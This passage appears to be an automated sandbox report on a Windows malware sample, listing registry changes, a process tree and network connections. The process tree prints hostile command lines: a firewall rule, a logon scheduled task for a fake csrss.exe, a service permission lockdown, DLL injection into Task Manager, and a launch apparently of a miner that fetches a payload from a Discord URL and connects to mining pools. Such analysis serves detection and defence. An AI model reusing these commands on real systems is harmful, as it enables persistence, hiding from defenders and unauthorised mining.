| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-911 = "Mauritius Daylight Time" | C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2182 = "Astrakhan Standard Time" | C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-402 = "Arabic Standard Time" | C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-215 = "Pacific Standard Time (Mexico)" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-452 = "Caucasus Standard Time" | C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1841 = "Russia TZ 4 Daylight Time" | C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1721 = "Libya Daylight Time" | C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1862 = "Russia TZ 6 Standard Time" | C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-442 = "Arabian Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-2142 = "Transbaikal Standard Time" | C:\Windows\windefender.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-2042 = "Eastern Standard Time (Mexico)" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-652 = "AUS Central Standard Time" | C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1501 = "Turkey Daylight Time" | C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-1022 = "Bangladesh Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-2411 = "Marquesas Daylight Time" | C:\Windows\windefender.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-332 = "E. Europe Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-292 = "Central European Standard Time" | C:\Windows\windefender.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-241 = "Samoa Daylight Time" | C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-131 = "US Eastern Daylight Time" | C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-2341 = "Haiti Daylight Time" | C:\Windows\windefender.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1471 = "Magadan Daylight Time" | C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-961 = "Paraguay Daylight Time" | C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-132 = "US Eastern Standard Time" | C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-602 = "Taipei Standard Time" | C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1502 = "Turkey Standard Time" | C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-448 = "Azerbaijan Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-432 = "Iran Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-401 = "Arabic Daylight Time" | C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-334 = "Jordan Daylight Time" | C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-341 = "Egypt Daylight Time" | C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-832 = "SA Eastern Standard Time" | C:\Windows\windefender.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-511 = "Central Asia Daylight Time" | C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2161 = "Altai Daylight Time" | C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-31 = "Mid-Atlantic Daylight Time" | C:\Windows\windefender.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-381 = "South Africa Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-392 = "Arab Standard Time" | C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-2412 = "Marquesas Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-372 = "Jerusalem Standard Time" | C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe
"C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe
"C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
C:\Windows\SYSTEM32\schtasks.exe
schtasks /delete /tn ScheduledUpdate /f
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
C:\Windows\windefender.exe
"C:\Windows\windefender.exe"
C:\Windows\SysWOW64\cmd.exe
cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
C:\Windows\SysWOW64\sc.exe
sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
C:\Windows\windefender.exe
C:\Windows\windefender.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe
C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe -xor=al2xoqueel0She4t -m=https://cdn.discordapp.com/attachments/1225871855328559147/1225878907014615161/kVYazCOZSwqudV?ex=6622bbb3&is=661046b3&hm=c80160577fcc82f0e337c537bdd214d60583ed75bb187a016d90f94471fc09b0& -pool tls://showlock.net:40001 -pool tls://showlock.net:443 -pool tcp://showlock.net:80
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exe
C:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exe
C:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 0943b7d5-b591-4eee-a503-917b095aaeee.uuid.localstats.org | udp |
| US | 8.8.8.8:53 | 0.0.0.0.0.0.0.6.0.0.0.0.0.0.0.1.0.0.0.0.0.0.0.0.8.0.8.0.8.0.8.0.ip6.arpa | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 8.8.8.8:53 | server4.localstats.org | udp |
| US | 8.8.8.8:53 | stun.stunprotocol.org | udp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| BG | 185.82.216.111:443 | server4.localstats.org | tcp |
| US | 8.8.8.8:53 | carsalessystem.com | udp |
| US | 172.67.221.71:443 | carsalessystem.com | tcp |
| US | 8.8.8.8:53 | stun.sipgate.net | udp |
| US | 15.197.250.192:3478 | stun.sipgate.net | udp |
| US | 8.8.8.8:53 | 192.250.197.15.in-addr.arpa | udp |
| BG | 185.82.216.111:443 | server4.localstats.org | tcp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| N/A | 127.0.0.1:3478 | udp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| BG | 185.82.216.111:443 | server4.localstats.org | tcp |
| US | 8.8.8.8:53 | 122.10.44.20.in-addr.arpa | udp |
| N/A | 127.0.0.1:31465 | tcp | |
| BG | 185.82.216.111:443 | server4.localstats.org | tcp |
| US | 8.8.8.8:53 | 79.190.18.2.in-addr.arpa | udp |
| BG | 185.82.216.111:443 | server4.localstats.org | tcp |
| US | 8.8.8.8:53 | carsalessystem.com | udp |
| US | 172.67.221.71:443 | carsalessystem.com | tcp |
| US | 8.8.8.8:53 | 233.135.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 100.8.8.46.in-addr.arpa | udp |
| N/A | 10.127.0.6:445 | tcp | |
| N/A | 10.127.0.23:445 | tcp | |
| N/A | 10.127.0.17:445 | tcp | |
| N/A | 10.127.0.34:445 | tcp | |
| N/A | 10.127.0.45:445 | tcp | |
| N/A | 10.127.0.3:445 | tcp | |
| N/A | 10.127.0.54:445 | tcp | |
| N/A | 10.127.0.40:445 | tcp | |
| N/A | 10.127.0.12:445 | tcp | |
| N/A | 10.127.0.55:445 | tcp | |
| N/A | 10.127.0.58:445 | tcp | |
| US | 8.8.8.8:53 | 44.27.3.81.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 225.243.59.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | snickerfool.com | udp |
| N/A | 10.127.0.133:445 | tcp | |
| N/A | 10.127.0.135:445 | tcp | |
| N/A | 10.127.0.183:445 | tcp | |
| N/A | 10.127.0.151:445 | tcp | |
| N/A | 10.127.0.172:445 | tcp | |
| N/A | 10.127.0.174:445 | tcp | |
| N/A | 10.127.0.131:445 | tcp | |
| N/A | 10.127.0.156:445 | tcp | |
| N/A | 10.127.0.184:445 | tcp | |
| N/A | 10.127.0.143:445 | tcp | |
| N/A | 10.127.0.175:445 | tcp | |
| N/A | 10.127.0.190:445 | tcp | |
| US | 8.8.8.8:53 | 25.4.79.80.in-addr.arpa | udp |
| N/A | 10.127.0.140:445 | tcp | |
| N/A | 10.127.0.179:445 | tcp | |
| N/A | 10.127.0.177:445 | tcp | |
| N/A | 10.127.0.137:445 | tcp | |
| N/A | 10.127.0.144:445 | tcp | |
| N/A | 10.127.0.148:445 | tcp | |
| N/A | 10.127.0.157:445 | tcp | |
| N/A | 10.127.0.159:445 | tcp | |
| N/A | 10.127.0.129:445 | tcp | |
| N/A | 10.127.0.168:445 | tcp | |
| N/A | 10.127.0.146:445 | tcp | |
| N/A | 10.127.0.155:445 | tcp | |
| N/A | 10.127.0.186:445 | tcp | |
| N/A | 10.127.0.141:445 | tcp | |
| N/A | 10.127.0.185:445 | tcp | |
| N/A | 10.127.0.164:445 | tcp | |
| N/A | 10.127.0.149:445 | tcp | |
| N/A | 10.127.0.153:445 | tcp | |
| N/A | 10.127.0.187:445 | tcp | |
| N/A | 10.127.0.130:445 | tcp | |
| N/A | 10.127.0.150:445 | tcp | |
| N/A | 10.127.0.180:445 | tcp | |
| N/A | 10.127.0.188:445 | tcp | |
| N/A | 10.127.0.160:445 | tcp | |
| N/A | 10.127.0.163:445 | tcp | |
| N/A | 10.127.0.152:445 | tcp | |
| N/A | 10.127.0.176:445 | tcp | |
| N/A | 10.127.0.132:445 | tcp | |
| N/A | 10.127.0.139:445 | tcp | |
| N/A | 10.127.0.178:445 | tcp | |
| N/A | 10.127.0.191:445 | tcp | |
| N/A | 10.127.0.136:445 | tcp | |
| N/A | 10.127.0.142:445 | tcp | |
| N/A | 10.127.0.145:445 | tcp | |
| N/A | 10.127.0.162:445 | tcp | |
| N/A | 10.127.0.173:445 | tcp | |
| N/A | 10.127.0.128:445 | tcp | |
| N/A | 10.127.0.138:445 | tcp | |
| N/A | 10.127.0.147:445 | tcp | |
| N/A | 10.127.0.154:445 | tcp | |
| N/A | 10.127.0.166:445 | tcp | |
| N/A | 10.127.0.182:445 | tcp | |
| N/A | 10.127.0.134:445 | tcp | |
| N/A | 10.127.0.165:445 | tcp | |
| N/A | 10.127.0.169:445 | tcp | |
| N/A | 10.127.0.170:445 | tcp | |
| N/A | 10.127.0.181:445 | tcp | |
| N/A | 10.127.0.189:445 | tcp | |
| N/A | 10.127.0.158:445 | tcp | |
| N/A | 10.127.0.161:445 | tcp | |
| N/A | 10.127.0.167:445 | tcp | |
| N/A | 10.127.0.171:445 | tcp | |
| N/A | 10.127.0.235:445 | tcp | |
| N/A | 10.127.0.254:445 | tcp | |
| N/A | 10.127.0.231:445 | tcp | |
| N/A | 10.127.0.203:445 | tcp | |
| N/A | 10.127.0.220:445 | tcp | |
| N/A | 10.127.0.244:445 | tcp | |
| N/A | 10.127.0.245:445 | tcp | |
| N/A | 10.127.0.209:445 | tcp | |
| N/A | 10.127.0.247:445 | tcp | |
| N/A | 10.127.0.255:445 | tcp | |
| N/A | 10.127.0.208:445 | tcp | |
| N/A | 10.127.0.232:445 | tcp | |
| N/A | 10.127.1.0:445 | tcp | |
| N/A | 10.127.0.212:445 | tcp | |
| N/A | 10.127.0.239:445 | tcp | |
| N/A | 10.127.0.230:445 | tcp | |
| N/A | 10.127.0.227:445 | tcp | |
| N/A | 10.127.0.214:445 | tcp | |
| N/A | 10.127.0.216:445 | tcp | |
| N/A | 10.127.0.201:445 | tcp | |
| N/A | 10.127.0.238:445 | tcp | |
| N/A | 10.127.0.213:445 | tcp | |
| N/A | 10.127.0.205:445 | tcp | |
| N/A | 10.127.0.204:445 | tcp | |
| N/A | 10.127.0.206:445 | tcp | |
| N/A | 10.127.0.195:445 | tcp | |
| N/A | 10.127.0.198:445 | tcp | |
| N/A | 10.127.0.251:445 | tcp | |
| N/A | 10.127.0.248:445 | tcp | |
| N/A | 10.127.0.223:445 | tcp | |
| N/A | 10.127.0.242:445 | tcp | |
| N/A | 10.127.0.218:445 | tcp | |
| N/A | 10.127.0.237:445 | tcp | |
| N/A | 10.127.0.226:445 | tcp | |
| N/A | 10.127.0.207:445 | tcp | |
| N/A | 10.127.0.200:445 | tcp | |
| N/A | 10.127.0.199:445 | tcp | |
| N/A | 10.127.0.243:445 | tcp | |
| N/A | 10.127.0.211:445 | tcp | |
| N/A | 10.127.0.240:445 | tcp | |
| N/A | 10.127.0.246:445 | tcp | |
| N/A | 10.127.0.194:445 | tcp | |
| N/A | 10.127.0.253:445 | tcp | |
| N/A | 10.127.0.210:445 | tcp | |
| N/A | 10.127.0.196:445 | tcp | |
| N/A | 10.127.0.225:445 | tcp | |
| N/A | 10.127.0.249:445 | tcp | |
| N/A | 10.127.0.197:445 | tcp | |
| N/A | 10.127.0.192:445 | tcp | |
| N/A | 10.127.0.193:445 | tcp | |
| N/A | 10.127.0.217:445 | tcp | |
| N/A | 10.127.0.224:445 | tcp | |
| N/A | 10.127.0.219:445 | tcp | |
| N/A | 10.127.0.233:445 | tcp | |
| N/A | 10.127.0.241:445 | tcp | |
| N/A | 10.127.0.228:445 | tcp | |
| N/A | 10.127.0.234:445 | tcp | |
| N/A | 10.127.0.236:445 | tcp | |
| N/A | 10.127.0.250:445 | tcp | |
| N/A | 10.127.0.222:445 | tcp | |
| N/A | 10.127.0.221:445 | tcp | |
| N/A | 10.127.0.229:445 | tcp | |
| N/A | 10.127.0.202:445 | tcp | |
